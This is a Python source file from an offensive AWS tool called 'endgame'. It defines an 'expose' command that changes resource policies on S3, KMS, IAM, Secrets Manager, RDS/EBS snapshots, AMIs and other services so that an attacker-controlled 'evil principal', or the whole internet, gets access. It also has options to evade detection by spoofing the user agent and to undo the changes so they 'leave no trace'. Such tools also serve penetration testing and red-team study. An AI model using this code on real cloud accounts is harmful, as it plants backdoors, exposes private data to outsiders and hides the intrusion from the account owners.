endgame/endgame/command/expose.py
2021-03-16 02:14:28 +01:00

241 lines
10 KiB
Python

"""
Expose AWS resources
"""
import json
import logging
import click
import boto3
from policy_sentry.util.arns import (
parse_arn_for_resource_type,
get_resource_path_from_arn,
)
from endgame import set_log_level
from endgame.exposure_via_resource_policies import glacier_vault, sqs, lambda_layer, lambda_function, kms, cloudwatch_logs, efs, s3, \
sns, iam, ecr, secrets_manager, ses, elasticsearch, acm_pca
from endgame.exposure_via_sharing_apis import rds_snapshots, ebs_snapshots, ec2_amis
from endgame.shared.aws_login import get_boto3_client, get_current_account_id
from endgame.shared import constants, utils
from endgame.shared.validate import (
click_validate_supported_aws_service,
click_validate_user_or_principal_arn,
)
from endgame.shared.response_message import ResponseMessage
logger = logging.getLogger(__name__)
END = "\033[0m"
GREY = "\33[90m"
CBLINK = '\33[5m'
CBLINK2 = '\33[6m'
@click.command(name="expose", short_help="Surgically expose resources by modifying resource policies to include backdoors to a rogue attacker-controlled IAM principal or to the internet.")
@click.option(
"--name",
"-n",
type=str,
required=True,
help="Specify the name of your resource",
)
@click.option(
"--evil-principal",
"-e",
type=str,
required=True,
help="Specify the name of your resource",
callback=click_validate_user_or_principal_arn,
envvar="EVIL_PRINCIPAL"
)
@click.option(
"--profile",
"-p",
type=str,
required=False,
help="Specify the AWS IAM profile.",
envvar="AWS_PROFILE"
)
@click.option(
"--service",
"-s",
type=click.Choice(constants.SUPPORTED_AWS_SERVICES),
required=False,
help="The AWS service in question",
callback=click_validate_supported_aws_service,
)
@click.option(
"--region",
"-r",
type=str,
required=False,
default="us-east-1",
help="The AWS region",
envvar="AWS_REGION"
)
@click.option(
"--dry-run",
"-d",
is_flag=True,
default=False,
help="Dry run, no modifications",
)
@click.option(
"--undo",
"-u",
is_flag=True,
default=False,
help="Undo the previous modifications and leave no trace",
)
@click.option(
"--cloak",
"-c",
is_flag=True,
default=False,
help="Evade detection by using the default AWS SDK user agent instead of one that indicates usage of this tool.",
)
@click.option(
"-v",
"--verbose",
"verbosity",
count=True,
)
def expose(name, evil_principal, profile, service, region, dry_run, undo, cloak, verbosity):
"""
Surgically expose resources by modifying resource policies to include backdoors to a rogue attacker-controlled IAM principal or to the internet.
:param name: The name of the AWS resource.
:param evil_principal: The ARN of the evil principal to give access to the resource.
:param profile: The AWS profile, if using the shared credentials file.
:param service: The AWS Service in question.
:param region: The AWS region. Defaults to us-east-1
:param dry_run: Dry run, no modifications
:param undo: Undo the previous modifications and leave no trace
:param cloak: Evade detection by using the default AWS SDK user agent instead of one that indicates usage of this tool.
:param verbosity: Set log verbosity.
:return:
"""
set_log_level(verbosity)
# User-supplied arguments like `cloudwatch` need to be translated to the IAM name like `logs`
provided_service = service
service = utils.get_service_translation(provided_service=service)
# Get Boto3 clients
client = get_boto3_client(profile=profile, service=service, region=region, cloak=cloak)
sts_client = get_boto3_client(profile=profile, service="sts", region=region, cloak=cloak)
# Get the current account ID
current_account_id = get_current_account_id(sts_client=sts_client)
if evil_principal.strip('"').strip("'") == "*":
principal_type = "internet-wide access"
principal_name = "*"
else:
principal_type = parse_arn_for_resource_type(evil_principal)
principal_name = get_resource_path_from_arn(evil_principal)
response_message = expose_service(provided_service=provided_service, region=region, name=name, current_account_id=current_account_id, client=client, dry_run=dry_run, evil_principal=evil_principal, undo=undo)
if undo and not dry_run:
utils.print_remove(response_message.service, response_message.resource_type, response_message.resource_name,
principal_type, principal_name, success=response_message.success)
elif undo and dry_run:
utils.print_remove(response_message.service, response_message.resource_type, response_message.resource_name,
principal_type, principal_name, success=response_message.success)
elif not undo and dry_run:
utils.print_add(response_message.service, response_message.resource_type, response_message.resource_name,
principal_type, principal_name, success=response_message.success)
else:
utils.print_add(response_message.service, response_message.resource_type, response_message.resource_name,
principal_type, principal_name, success=response_message.success)
if verbosity >= 1:
print_diff_messages(response_message=response_message, verbosity=verbosity)
def expose_service(
provided_service: str,
region: str,
name: str,
current_account_id: str,
client: boto3.Session.client,
undo: bool,
dry_run: bool,
evil_principal: str
) -> ResponseMessage:
"""Expose a resource from an AWS Service. You can call this function directly."""
service = provided_service
resource = None
# fmt: off
if service == "acm-pca":
resource = acm_pca.AcmPrivateCertificateAuthority(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "ecr":
resource = ecr.EcrRepository(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "efs" or service == "elasticfilesystem":
resource = efs.ElasticFileSystem(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "elasticsearch" or service == "es":
resource = elasticsearch.ElasticSearchDomain(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "glacier":
resource = glacier_vault.GlacierVault(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "iam":
resource = iam.IAMRole(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "kms":
resource = kms.KmsKey(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "lambda":
resource = lambda_function.LambdaFunction(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "lambda-layer":
resource = lambda_layer.LambdaLayer(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "logs" or service == "cloudwatch":
resource = cloudwatch_logs.CloudwatchResourcePolicy(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "s3":
resource = s3.S3Bucket(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "secretsmanager":
resource = secrets_manager.SecretsManagerSecret(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "ses":
resource = ses.SesIdentityPolicy(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "sns":
resource = sns.SnsTopic(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "sqs":
resource = sqs.SqsQueue(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "rds":
resource = rds_snapshots.RdsSnapshot(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "ebs":
resource = ebs_snapshots.EbsSnapshot(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "ec2-ami":
resource = ec2_amis.Ec2Image(name=name, client=client, current_account_id=current_account_id, region=region)
# fmt: on
if undo and not dry_run:
response_message = resource.undo(evil_principal=evil_principal)
elif dry_run and not undo:
response_message = resource.add_myself(evil_principal=evil_principal, dry_run=dry_run)
elif dry_run and undo:
response_message = resource.undo(evil_principal=evil_principal, dry_run=dry_run)
else:
response_message = resource.add_myself(evil_principal=evil_principal, dry_run=False)
return response_message
def print_diff_messages(response_message: ResponseMessage, verbosity: int):
if verbosity >= 2:
utils.print_grey(f"Old statement IDs: {response_message.original_policy_sids}")
utils.print_grey(f"Updated statement IDs: {response_message.updated_policy_sids}")
# TODO: This output format works for exposure_via_resource_policies, not necessarily for exposure_via_sharing_apis.
if response_message.added_sids:
logger.debug("Statements are being added")
diff = response_message.added_sids
utils.print_yellow(f"\t+ Resource: {response_message.victim_resource_arn}")
utils.print_green(f"\t++ (New statements): {', '.join(diff)}")
utils.print_green(f"\t++ (Evil Principal): {response_message.evil_principal}")
elif len(response_message.updated_policy_sids) == len(response_message.original_policy_sids):
utils.print_yellow(f"\t* Resource: {response_message.victim_resource_arn}")
utils.print_yellow(f"\t** (No new statements)")
else:
logger.debug("Statements are being removed")
diff = response_message.removed_sids
utils.print_yellow(f"\t- Resource: {response_message.victim_resource_arn}")
utils.print_red(f"\t-- Statements being removed: {', '.join(diff)}")
if verbosity >= 3:
utils.print_grey("Original policy:")
utils.print_grey(json.dumps(response_message.original_policy))
utils.print_grey("New policy:")
utils.print_grey(json.dumps(response_message.updated_policy))